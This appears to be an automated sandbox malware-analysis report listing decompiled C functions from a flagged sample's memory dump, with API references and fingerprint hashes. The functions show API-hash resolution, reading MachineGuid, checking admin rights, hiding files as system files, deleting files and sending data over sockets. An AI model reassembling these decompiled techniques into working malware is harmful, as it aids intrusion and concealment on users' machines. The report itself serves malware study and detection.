                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateNameProcessUser_wmemset
                                              • String ID: CA
                                              • API String ID: 2078537776-1052703068
                                              • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                              • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                              				int _t7;
                                              				void* _t8;
                                              
                                              				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                                              				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                              				return _t7;
                                              			}

                                              APIs
                                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InformationToken
                                              • String ID: IDA
                                              • API String ID: 4114910276-365204570
                                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                                              				_Unknown_base(*)()* _t5;
                                              				void* _t6;
                                              
                                              				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                                              				_t1 =  &_a8; // 0x403173
                                              				_t5 = GetProcAddress(_a4,  *_t1); // executed
                                              				return _t5;
                                              			}

                                              APIs
                                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID: s1@
                                              • API String ID: 190572456-427247929
                                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00404A52(void* _a4, char* _a8, char* _a12) {
                                              				void* _v8;
                                              				int _v12;
                                              				void* __ebx;
                                              				char* _t10;
                                              				long _t13;
                                              				char* _t27;
                                              
                                              				_push(_t21);
                                              				_t27 = E00402B7C(0x208);
                                              				if(_t27 == 0) {
                                              					L4:
                                              					_t10 = 0;
                                              				} else {
                                              					E00402B4E(_t27, 0, 0x208);
                                              					_v12 = 0x208;
                                              					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                                              					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                              					if(_t13 != 0) {
                                              						E00402BAB(_t27);
                                              						goto L4;
                                              					} else {
                                              						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                                              						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                                              						E00404A39(_v8); // executed
                                              						_t10 = _t27;
                                              					}
                                              				}
                                              				return _t10;
                                              			}

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 1425999871-0
                                              • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                              • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 40%
                                              			E004060BD(void* __eflags) {
                                              				signed int _v8;
                                              				char _v12;
                                              				short _v16;
                                              				char _v20;
                                              				void* __ebx;
                                              				intOrPtr* _t12;
                                              				signed int _t13;
                                              				intOrPtr* _t14;
                                              				signed int _t15;
                                              				void* _t24;
                                              
                                              				_v16 = 0x500;
                                              				_v20 = 0;
                                              				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                                              				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                              				_v8 = _t13;
                                              				if(_t13 != 0) {
                                              					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                                              					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                                              					asm("sbb eax, eax");
                                              					_v8 = _v8 &  ~_t15;
                                              					E0040604F(_v12);
                                              					return _v8;
                                              				}
                                              				return _t13;
                                               			}

                                               Instruction addresses: 0x004060c6, 0x004060d5, 0x004060d8, 0x004060f4, 0x004060f6, 0x004060fb, 0x0040610a, 0x00406115, 0x0040611c, 0x0040611e, 0x00406121, 0x00000000, 0x0040612a, 0x0040612f

                                              APIs
                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CheckMembershipToken
                                              • String ID:
                                              • API String ID: 1351025785-0
                                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                                              				void* _t3;
                                              				int _t5;
                                              
                                              				_t3 = E00403D4D(__eflags, _a4); // executed
                                              				if(_t3 == 0) {
                                              					__eflags = 0;
                                              					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                                              					_t5 = CreateDirectoryW(_a4, 0); // executed
                                              					return _t5;
                                              				} else {
                                              					return 1;
                                              				}
                                               			}

                                               Instruction addresses: 0x00403c68, 0x00403c70, 0x00403c78, 0x00403c82, 0x00403c8b, 0x00403c8f, 0x00403c72, 0x00403c76, 0x00403c76

                                              APIs
                                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E0040642C(void* __eflags) {
                                              				short _v40;
                                              				intOrPtr* _t6;
                                              				void* _t10;
                                              
                                              				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                                              				 *_t6( &_v40); // executed
                                              				return 0 | _v40 == 0x00000009;
                                               			}

                                               Instruction addresses: 0x0040643c, 0x00406445, 0x00406454

                                              APIs
                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				intOrPtr _t5;
                                              
                                              				_t5 = _a12;
                                              				if(_t5 == 0) {
                                              					_t5 = E00405D0B(_a8) + 1;
                                              				}
                                              				__imp__#19(_a4, _a8, _t5, 0); // executed
                                              				return _t5;
                                               			}

                                               Instruction addresses: 0x00404eed, 0x00404ef2, 0x00404efd, 0x00404efd, 0x00404f07, 0x00404f0e

                                              APIs
                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                                              				int _t6;
                                              				void* _t7;
                                              
                                              				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                                              				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                                              				return _t6;
                                               			}

                                               Instruction addresses: 0x00403bdd, 0x00403beb, 0x00403bee

                                              APIs
                                              • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileMove
                                              • String ID:
                                              • API String ID: 3562171763-0
                                              • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                              • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0040427D(WCHAR* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                                              				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                                              				return _t4;
                                               			}

                                               Instruction addresses: 0x0040428a, 0x00404297, 0x0040429a

                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                              • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00404A19(void* _a4, short* _a8, void** _a12) {
                                              				long _t5;
                                              				void* _t6;
                                              
                                              				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                                              				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                                              				return _t5;
                                               			}

                                               Instruction addresses: 0x00404a27, 0x00404a35, 0x00404a38

                                              APIs
                                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                              • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403C40(void* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                                              				_t4 = FindCloseChangeNotification(_a4); // executed
                                              				return _t4;
                                               			}

                                               Instruction addresses: 0x00403c4d, 0x00403c55, 0x00403c58

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                              • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403C08(WCHAR* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                                              				_t4 = DeleteFileW(_a4); // executed
                                              				return _t4;
                                               			}

                                               Instruction addresses: 0x00403c15, 0x00403c1d, 0x00403c20

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                              • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00402C1F(WCHAR* _a4) {
                                              				struct HINSTANCE__* _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                                              				_t4 = LoadLibraryW(_a4); // executed
                                              				return _t4;
                                               			}

                                               Instruction addresses: 0x00402c2c, 0x00402c34, 0x00402c37

                                              APIs
                                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                              • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403BEF(void* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                                              				_t4 = FindClose(_a4); // executed
                                              				return _t4;
                                               			}

                                               Instruction addresses: 0x00403bfc, 0x00403c04, 0x00403c07

                                              APIs
                                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                              • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403BB7(WCHAR* _a4) {
                                              				long _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                                              				_t4 = GetFileAttributesW(_a4); // executed
                                              				return _t4;
                                               			}

                                               Instruction addresses: 0x00403bc4, 0x00403bcc, 0x00403bcf

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                              • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004049FF(void* _a4) {
                                              				long _t3;
                                              				void* _t4;
                                              
                                              				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                                              				_t3 = RegCloseKey(_a4); // executed
                                              				return _t3;
                                               			}

                                               Instruction addresses: 0x00404a0d, 0x00404a15, 0x00404a18

                                              APIs
                                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                              • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                              Uniqueness

                                              Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403B64(WCHAR* _a4) {
	int _t3;
	void* _t4;

	E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
	_t3 = PathFileExistsW(_a4); // executed
	return _t3;
}

Instruction addresses: 0x00403b72, 0x00403b7a, 0x00403b7d

APIs
• PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID:
• API String ID: 1174141254-0
• Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
• Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
• Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
• Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
Uniqueness

Uniqueness Score: -1.00%

APIs
• closesocket.WS2_32(00404EB0), ref: 00404DEB
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: closesocket
• String ID:
• API String ID: 2781271927-0
• Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
• Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
• Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
• Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403F9E(void* _a4) {
	int _t3;
	void* _t4;

	E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
	_t3 = VirtualFree(_a4, 0, 0x8000); // executed; 0x8000 is MEM_RELEASE
	return _t3;
}

Instruction addresses: 0x00403fac, 0x00403fba, 0x00403fbe

APIs
• VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
• Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
• Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
• Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406472(long _a4) {
	void* _t3;
	void* _t4;

	_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
	Sleep(_a4); // executed
	return _t3;
}

Instruction addresses: 0x0040647f, 0x00406487, 0x0040648a

APIs
• Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
• Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
• Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
• Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004058EA(char* _a4, char* _a8) {
	char* _t4;
	void* _t5;

	E004031E5(_t5, 2, 0xc5c16604, 0, 0);
	_t4 = StrStrA(_a4, _a8); // executed
	return _t4;
}

Instruction addresses: 0x004058f8, 0x00405903, 0x00405906

APIs
• StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
Memory Dump Source
• Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
• Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
• Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
